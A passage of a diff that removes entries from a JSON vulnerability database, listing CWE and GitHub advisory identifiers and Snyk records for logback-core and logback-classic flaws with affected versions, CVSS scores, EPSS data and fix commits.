-        "id": "CWE-113",
-        "source": "cwe"
-      },
-      "CWE-138": {
-        "id": "CWE-138",
-        "source": "cwe"
-      },
-      "CWE-178": {
-        "id": "CWE-178",
-        "source": "cwe"
-      },
-      "CWE-20": {
-        "id": "CWE-20",
-        "source": "cwe"
-      },
-      "CWE-200": {
-        "id": "CWE-200",
-        "source": "cwe"
-      },
-      "CWE-22": {
-        "id": "CWE-22",
-        "source": "cwe"
-      },
-      "CWE-23": {
-        "id": "CWE-23",
-        "source": "cwe"
-      },
-      "CWE-265": {
-        "id": "CWE-265",
-        "source": "cwe"
-      },
-      "CWE-284": {
-        "id": "CWE-284",
-        "source": "cwe"
-      },
-      "CWE-287": {
-        "id": "CWE-287",
-        "source": "cwe"
-      },
-      "CWE-297": {
-        "id": "CWE-297",
-        "source": "cwe"
-      },
-      "CWE-305": {
-        "id": "CWE-305",
-        "source": "cwe"
-      },
-      "CWE-362": {
-        "id": "CWE-362",
-        "source": "cwe"
-      },
-      "CWE-400": {
-        "id": "CWE-400",
-        "source": "cwe"
-      },
-      "CWE-401": {
-        "id": "CWE-401",
-        "source": "cwe"
-      },
-      "CWE-404": {
-        "id": "CWE-404",
-        "source": "cwe"
-      },
-      "CWE-434": {
-        "id": "CWE-434",
-        "source": "cwe"
-      },
-      "CWE-444": {
-        "id": "CWE-444",
-        "source": "cwe"
-      },
-      "CWE-454": {
-        "id": "CWE-454",
-        "source": "cwe"
-      },
-      "CWE-502": {
-        "id": "CWE-502",
-        "source": "cwe"
-      },
-      "CWE-601": {
-        "id": "CWE-601",
-        "source": "cwe"
-      },
-      "CWE-625": {
-        "id": "CWE-625",
-        "source": "cwe"
-      },
-      "CWE-674": {
-        "id": "CWE-674",
-        "source": "cwe"
-      },
-      "CWE-770": {
-        "id": "CWE-770",
-        "source": "cwe"
-      },
-      "CWE-789": {
-        "id": "CWE-789",
-        "source": "cwe"
-      },
-      "CWE-862": {
-        "id": "CWE-862",
-        "source": "cwe"
-      },
-      "CWE-863": {
-        "id": "CWE-863",
-        "source": "cwe"
-      },
-      "CWE-918": {
-        "id": "CWE-918",
-        "source": "cwe"
-      },
-      "CWE-94": {
-        "id": "CWE-94",
-        "source": "cwe"
-      },
-      "GHSA-2p3x-qw9c-25hh": {
-        "id": "GHSA-2p3x-qw9c-25hh",
-        "source": "ghsa"
-      },
-      "GHSA-2q8x-2p7f-574v": {
-        "id": "GHSA-2q8x-2p7f-574v",
-        "source": "ghsa"
-      },
-      "GHSA-3ccq-5vw3-2p6x": {
-        "id": "GHSA-3ccq-5vw3-2p6x",
-        "source": "ghsa"
-      },
-      "GHSA-3jrv-jgp8-45v3": {
-        "id": "GHSA-3jrv-jgp8-45v3",
-        "source": "ghsa"
-      },
-      "GHSA-3mq5-fq9h-gj7j": {
-        "id": "GHSA-3mq5-fq9h-gj7j",
-        "source": "ghsa"
-      },
-      "GHSA-43gc-mjxg-gvrq": {
-        "id": "GHSA-43gc-mjxg-gvrq",
-        "source": "ghsa"
-      },
-      "GHSA-4cch-wxpw-8p28": {
-        "id": "GHSA-4cch-wxpw-8p28",
-        "source": "ghsa"
-      },
-      "GHSA-4hrm-m67v-5cxr": {
-        "id": "GHSA-4hrm-m67v-5cxr",
-        "source": "ghsa"
-      },
-      "GHSA-56p8-3fh9-4cvq": {
-        "id": "GHSA-56p8-3fh9-4cvq",
-        "source": "ghsa"
-      },
-      "GHSA-59jw-jqf4-3wq3": {
-        "id": "GHSA-59jw-jqf4-3wq3",
-        "source": "ghsa"
-      },
-      "GHSA-64xx-cq4q-mf44": {
-        "id": "GHSA-64xx-cq4q-mf44",
-        "source": "ghsa"
-      },
-      "GHSA-6v67-2wr5-gvf4": {
-        "id": "GHSA-6v67-2wr5-gvf4",
-        "source": "ghsa"
-      },
-      "GHSA-6w62-hx7r-mw68": {
-        "id": "GHSA-6w62-hx7r-mw68",
-        "source": "ghsa"
-      },
-      "GHSA-6wf9-jmg9-vxcc": {
-        "id": "GHSA-6wf9-jmg9-vxcc",
-        "source": "ghsa"
-      },
-      "GHSA-72qj-48g4-5xgx": {
-        "id": "GHSA-72qj-48g4-5xgx",
-        "source": "ghsa"
-      },
-      "GHSA-74cv-f58x-f9wf": {
-        "id": "GHSA-74cv-f58x-f9wf",
-        "source": "ghsa"
-      },
-      "GHSA-7chv-rrw6-w6fc": {
-        "id": "GHSA-7chv-rrw6-w6fc",
-        "source": "ghsa"
-      },
-      "GHSA-7hwc-46rm-65jh": {
-        "id": "GHSA-7hwc-46rm-65jh",
-        "source": "ghsa"
-      },
-      "GHSA-8jrj-525p-826v": {
-        "id": "GHSA-8jrj-525p-826v",
-        "source": "ghsa"
-      },
-      "GHSA-9442-gm4v-r222": {
-        "id": "GHSA-9442-gm4v-r222",
-        "source": "ghsa"
-      },
-      "GHSA-95h4-w6j8-2rp8": {
-        "id": "GHSA-95h4-w6j8-2rp8",
-        "source": "ghsa"
-      },
-      "GHSA-9623-mqmm-5rcf": {
-        "id": "GHSA-9623-mqmm-5rcf",
-        "source": "ghsa"
-      },
-      "GHSA-ch7q-gpff-h9hp": {
-        "id": "GHSA-ch7q-gpff-h9hp",
-        "source": "ghsa"
-      },
-      "GHSA-cxfm-5m4g-x7xp": {
-        "id": "GHSA-cxfm-5m4g-x7xp",
-        "source": "ghsa"
-      },
-      "GHSA-f6hm-88x3-mfjv": {
-        "id": "GHSA-f6hm-88x3-mfjv",
-        "source": "ghsa"
-      },
-      "GHSA-g5w6-mrj7-75h2": {
-        "id": "GHSA-g5w6-mrj7-75h2",
-        "source": "ghsa"
-      },
-      "GHSA-h7v4-7xg3-hxcc": {
-        "id": "GHSA-h7v4-7xg3-hxcc",
-        "source": "ghsa"
-      },
-      "GHSA-hfq9-hggm-c56q": {
-        "id": "GHSA-hfq9-hggm-c56q",
-        "source": "ghsa"
-      },
-      "GHSA-hph2-m3g5-xxv4": {
-        "id": "GHSA-hph2-m3g5-xxv4",
-        "source": "ghsa"
-      },
-      "GHSA-hrcp-8f3q-4w2c": {
-        "id": "GHSA-hrcp-8f3q-4w2c",
-        "source": "ghsa"
-      },
-      "GHSA-hvv8-336g-rx3m": {
-        "id": "GHSA-hvv8-336g-rx3m",
-        "source": "ghsa"
-      },
-      "GHSA-hwpc-8xqv-jvj4": {
-        "id": "GHSA-hwpc-8xqv-jvj4",
-        "source": "ghsa"
-      },
-      "GHSA-j288-q9x7-2f5v": {
-        "id": "GHSA-j288-q9x7-2f5v",
-        "source": "ghsa"
-      },
-      "GHSA-j3g3-5qv5-52mj": {
-        "id": "GHSA-j3g3-5qv5-52mj",
-        "source": "ghsa"
-      },
-      "GHSA-j563-grx4-pjpv": {
-        "id": "GHSA-j563-grx4-pjpv",
-        "source": "ghsa"
-      },
-      "GHSA-j9h8-phrw-h4fh": {
-        "id": "GHSA-j9h8-phrw-h4fh",
-        "source": "ghsa"
-      },
-      "GHSA-jfvx-7wrx-43fh": {
-        "id": "GHSA-jfvx-7wrx-43fh",
-        "source": "ghsa"
-      },
-      "GHSA-jjfh-589g-3hjx": {
-        "id": "GHSA-jjfh-589g-3hjx",
-        "source": "ghsa"
-      },
-      "GHSA-jmp9-x22r-554x": {
-        "id": "GHSA-jmp9-x22r-554x",
-        "source": "ghsa"
-      },
-      "GHSA-mjmj-j48q-9wg2": {
-        "id": "GHSA-mjmj-j48q-9wg2",
-        "source": "ghsa"
-      },
-      "GHSA-mw36-7c6c-q4q2": {
-        "id": "GHSA-mw36-7c6c-q4q2",
-        "source": "ghsa"
-      },
-      "GHSA-p8pq-r894-fm8f": {
-        "id": "GHSA-p8pq-r894-fm8f",
-        "source": "ghsa"
-      },
-      "GHSA-pr98-23f8-jwxv": {
-        "id": "GHSA-pr98-23f8-jwxv",
-        "source": "ghsa"
-      },
-      "GHSA-qpfq-ph7r-qv6f": {
-        "id": "GHSA-qpfq-ph7r-qv6f",
-        "source": "ghsa"
-      },
-      "GHSA-qrx8-8545-4wg2": {
-        "id": "GHSA-qrx8-8545-4wg2",
-        "source": "ghsa"
-      },
-      "GHSA-rgh3-987h-wpmw": {
-        "id": "GHSA-rgh3-987h-wpmw",
-        "source": "ghsa"
-      },
-      "GHSA-rmr5-cpv2-vgjf": {
-        "id": "GHSA-rmr5-cpv2-vgjf",
-        "source": "ghsa"
-      },
-      "GHSA-w6qf-42m7-vh68": {
-        "id": "GHSA-w6qf-42m7-vh68",
-        "source": "ghsa"
-      },
-      "GHSA-xw4p-crpj-vjx2": {
-        "id": "GHSA-xw4p-crpj-vjx2",
-        "source": "ghsa"
-      },
-      "SNYK-JAVA-CHQOSLOGBACK-13169722": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.5.19)"
-        ],
-        "created_at": "2025-10-01T12:16:51.884016Z",
-        "credits": [
-          "Unknown"
-        ],
-        "cvss_base_score": 5.9,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 5.9,
-            "cvss_version": "4.0",
-            "modified_at": "2025-10-01T12:16:52.160102Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 6.4,
-            "cvss_version": "3.1",
-            "modified_at": "2025-10-01T12:16:52.160102Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:L"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 6.4,
-            "cvss_version": "3.1",
-            "modified_at": "2025-10-04T19:43:14.046068Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:L"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L",
-        "disclosed_at": "2025-10-01T07:46:31.257Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.11888",
-          "probability": "0.00040"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-CHQOSLOGBACK-13169722",
-        "initially_fixed_in_versions": [
-          "1.5.19"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-10-04T19:43:14.046068Z",
-        "package_name": "ch.qos.logback:logback-core",
-        "package_version": "",
-        "published_at": "2025-10-01T12:16:52.127237Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/61f6a2544f36b3016e0efd434ee21f19269f1df7"
-          },
-          {
-            "title": "Release Notes",
-            "url": "https://logback.qos.ch/news.html%231.5.19"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-CHQOSLOGBACK-6094942": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.2.13)",
-          "[1.3.0-alpha0,1.3.12)",
-          "[1.4.0,1.4.12)"
-        ],
-        "created_at": "2023-11-29T14:25:57.863988Z",
-        "credits": [
-          "Yakov Shafranovich"
-        ],
-        "cvss_base_score": 7.1,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T14:02:24.958701Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:54:08.863927Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:54:08.776489Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
-        "disclosed_at": "2023-11-29T13:44:14Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.65373",
-          "probability": "0.00506"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-CHQOSLOGBACK-6094942",
-        "initially_fixed_in_versions": [
-          "1.2.13",
-          "1.3.12",
-          "1.4.12"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:54:08.863927Z",
-        "package_name": "ch.qos.logback:logback-classic",
-        "package_version": "",
-        "published_at": "2023-11-29T14:25:58.114686Z",
-        "references": [
-          {
-            "title": "Changelog",
-            "url": "https://logback.qos.ch/news.html%231.3.12"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/9c782b45be4abdafb7e17481e24e7354c2acd1eb"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/b8eac23a9de9e05fb6d51160b3f46acd91af9731"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/bb095154be011267b64e37a1d401546e7cc2b7c3"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-CHQOSLOGBACK-6094943": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.2.13)",
-          "[1.3.0-alpha0,1.3.12)",
-          "[1.4.0,1.4.12)"
-        ],
-        "created_at": "2023-11-29T14:25:58.134796Z",
-        "credits": [
-          "Yakov Shafranovich"
-        ],
-        "cvss_base_score": 7.1,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T14:02:24.958701Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:54:08.863927Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:54:08.776489Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
-        "disclosed_at": "2023-11-29T13:44:14Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.65373",
-          "probability": "0.00506"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-CHQOSLOGBACK-6094943",
-        "initially_fixed_in_versions": [
-          "1.2.13",
-          "1.3.12",
-          "1.4.12"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:54:08.863927Z",
-        "package_name": "ch.qos.logback:logback-core",
-        "package_version": "",
-        "published_at": "2023-11-29T14:25:58.336471Z",
-        "references": [
-          {
-            "title": "Changelog",
-            "url": "https://logback.qos.ch/news.html%231.3.12"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/9c782b45be4abdafb7e17481e24e7354c2acd1eb"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/b8eac23a9de9e05fb6d51160b3f46acd91af9731"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/bb095154be011267b64e37a1d401546e7cc2b7c3"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-CHQOSLOGBACK-6097492": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.2.13)",
-          "[1.3.0,1.3.14)",
-          "[1.4.0,1.4.14)"
-        ],
-        "created_at": "2023-12-04T14:58:05.575079Z",
-        "credits": [
-          "Unknown"
-        ],
-        "cvss_base_score": 7.1,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T14:09:26.895867Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:54:09.811455Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:54:09.139951Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
-        "disclosed_at": "2023-12-04T09:44:53Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.40501",
-          "probability": "0.00185"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-CHQOSLOGBACK-6097492",
-        "initially_fixed_in_versions": [
-          "1.2.13",
-          "1.3.14",
-          "1.4.14"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:54:09.811455Z",
-        "package_name": "ch.qos.logback:logback-classic",
-        "package_version": "",
-        "published_at": "2023-12-04T15:19:15.817374Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/7018a3609c7bcc9dc7bf5903509901a986e5f578"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/bb095154be011267b64e37a1d401546e7cc2b7c3"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/c612b2fa3caf6eef3c75f1cd5859438451d0fd6f"
-          },
-          {
-            "title": "Release Notes",
-            "url": "https://logback.qos.ch/news.html%231.2.13"
-          },
-          {
-            "title": "Release Notes",
-            "url": "https://logback.qos.ch/news.html%231.3.14"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-CHQOSLOGBACK-6097493": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.2.13)",
-          "[1.3.0,1.3.14)",
-          "[1.4.0,1.4.14)"
-        ],
-        "created_at": "2023-12-04T14:58:05.925944Z",
-        "credits": [
-          "Unknown"
-        ],
-        "cvss_base_score": 7.1,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T14:09:26.895867Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:54:09.811455Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:54:09.139951Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
-        "disclosed_at": "2023-12-04T09:44:53Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.40501",
-          "probability": "0.00185"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-CHQOSLOGBACK-6097493",
-        "initially_fixed_in_versions": [
-          "1.2.13",
-          "1.3.14",
-          "1.4.14"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:54:09.811455Z",
-        "package_name": "ch.qos.logback:logback-core",
-        "package_version": "",
-        "published_at": "2023-12-04T15:19:16.016949Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/7018a3609c7bcc9dc7bf5903509901a986e5f578"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/bb095154be011267b64e37a1d401546e7cc2b7c3"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/c612b2fa3caf6eef3c75f1cd5859438451d0fd6f"
-          },
-          {
-            "title": "Release Notes",
-            "url": "https://logback.qos.ch/news.html%231.2.13"
-          },
-          {
-            "title": "Release Notes",
-            "url": "https://logback.qos.ch/news.html%231.3.14"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-CHQOSLOGBACK-8539865": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.3.15)",
-          "[1.4.0,1.5.13)"
-        ],
-        "created_at": "2024-12-20T09:18:30.241574Z",
-        "credits": [
-          "7asecurity"
-        ],
-        "cvss_base_score": 2.4,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 2.4,
-            "cvss_version": "4.0",
-            "modified_at": "2025-01-09T15:37:00.429266Z",
-            "severity": "low",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:L/VI:N/VA:L/SC:H/SI:H/SA:H"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2025-01-09T15:37:00.429266Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 3.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-12-20T13:34:22.292262Z",
-            "severity": "low",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:L/VI:N/VA:L/SC:H/SI:H/SA:H",
-        "disclosed_at": "2024-12-19T18:31:37Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.16298",
-          "probability": "0.00052"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-CHQOSLOGBACK-8539865",
-        "initially_fixed_in_versions": [
-          "1.3.15",
-          "1.5.13"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-01-09T15:37:00.429266Z",
-        "package_name": "ch.qos.logback:logback-core",
-        "package_version": "",
-        "published_at": "2024-12-20T09:26:25.178712Z",
-        "references": [
-          {
-            "title": "Additional Information",
-            "url": "https://logback.qos.ch/news.html%231.5.13"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/2863a4974a3649b5b00d4a529ee6ff2063470f35"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/5f05041cba4c4ac0a62748c5c527a2da48999f2d"
-          },
-          {
-            "title": "Release Notes",
-            "url": "https://logback.qos.ch/news.html%231.3.15"
-          }
-        ],
-        "severity": "low",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-CHQOSLOGBACK-8539866": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.3.15)",
-          "[1.4.0,1.5.13)"
-        ],
-        "created_at": "2024-12-20T09:32:47.316612Z",
-        "credits": [
-          "7asecurity"
-        ],
-        "cvss_base_score": 5.9,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 5.9,
-            "cvss_version": "4.0",
-            "modified_at": "2025-01-09T15:34:31.006257Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:P/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 6.4,
-            "cvss_version": "3.1",
-            "modified_at": "2025-01-09T15:34:31.006257Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:H/A:L"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 5.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-12-20T13:34:31.3459Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:P/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L",
-        "disclosed_at": "2024-12-19T18:31:37Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.44420",
-          "probability": "0.00218"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-CHQOSLOGBACK-8539866",
-        "initially_fixed_in_versions": [
-          "1.3.15",
-          "1.5.13"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-01-09T15:34:31.006257Z",
-        "package_name": "ch.qos.logback:logback-core",
-        "package_version": "",
-        "published_at": "2024-12-20T13:49:24.170686Z",
-        "references": [
-          {
-            "title": "Additional Information",
-            "url": "https://logback.qos.ch/news.html%231.5.13"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/2cb6d520df7592ef1c3a198f1b5df3c10c93e183"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/qos-ch/logback/commit/b44b940cc7d4839e06e31a7d60dca174b99c1aa5"
-          },
-          {
-            "title": "Release Notes",
-            "url": "https://logback.qos.ch/news.html%231.3.15"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-CHQOSLOGBACK-8539867": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.3.15)",
-          "[1.4.0,1.5.13)"
-        ],
-        "created_at": "2024-12-20T09:32:47.899909Z",
-        "credits": [
-          "7asecurity"
-        ],
-        "cvss_base_score": 5.9,
-        "cvss_sources": [
-          {
